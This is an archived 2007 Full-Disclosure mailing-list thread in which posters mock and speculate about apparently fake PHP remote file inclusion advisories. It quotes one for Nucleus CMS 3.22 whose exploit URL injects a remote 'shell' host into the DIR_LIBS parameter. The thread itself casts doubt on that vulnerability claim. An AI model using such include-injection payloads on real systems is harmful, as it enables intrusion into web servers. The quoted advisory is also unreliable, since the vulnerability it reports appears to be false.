full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] nucleus 3.22 >>

Re: [Full-disclosure] nucleus 3.22 >> RFI

From: evilrabbi <evilrabbi_at_nospam>
Date: Tue May 08 2007 - 13:18:44 GMT
To: full-disclosure@lists.grok.org.uk


I like the idea they are all terrorist passing secret messages in fake exploits.
/me waits on the Tom Clancy movie

On 5/7/07, Ron Superior <rsuperior@gmail.com> wrote:
>
> Hi folks,
>
> Some months back I seem to remember people hypothesizing as to the
> real purpose behind some of these particularly lame fake PHP exploits.
> You know the ones I mean; they're mostly remote file includes, they
> often are decorated with some simple ASCII art, and the "thanks" and
> "greetz" sections are always loaded with names that suggest Turkish or
> other Middle Eastern origin.
>
> The two most interesting suggestions that I recall were:
>
> 1) Somebody wanted to pump up the lists with PHP exploits so they
> could claim later that some large number X of PHP vulnerabilities had
> been posted to FD since some date.
>
> 2) Covert communication, or that the "exploits" were really secret
> messages between t3rr0ri$ts or something.
>
> I'm sure there exists a motive beyond just spamming us to be
> annoying. Any one have any new ideas, or good arguments for either of
> the above two ideas?
>
> Ron
>
> Guasconi Vincent wrote:
> > On 5/6/07, security curmudgeon <jericho@attrition.org> wrote:
> >> : VENDOR :http://nucleuscms.org/
> >> : BY : s3rv3r_hack3r (hackerz.ir admin)
> >> : bug:
> >> : nucleus3.22/nucleus/plugins/skinfiles/index.php =
> include($DIR_LIBS . 'PLUGINADMIN.php');
> >> : Exloit:
> >> :
> http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
> >>
> >> I haven't examined the source code to this, but on June 16, 2006,
> >> gamr-14@hotmail.com disclosed RFI vulnerabilities [1] in four Nucleus
> >> scripts, all with the DIR_LIBS variable as the injection point. This
> was
> >> subsequently proven to be a false report as the variable was previously
> >> set and could not be manipulated by an attacker.
> >>
> >> Have you actually tested this, or is this based on a quick grep of the
> >> source code?
> >
> > They're like bots now.
> > They didn't hear you, and you can't stop them.
> >
> > Try a spam rule.
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-- -- h0 h0 h0 -- www.nopsled.net

_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/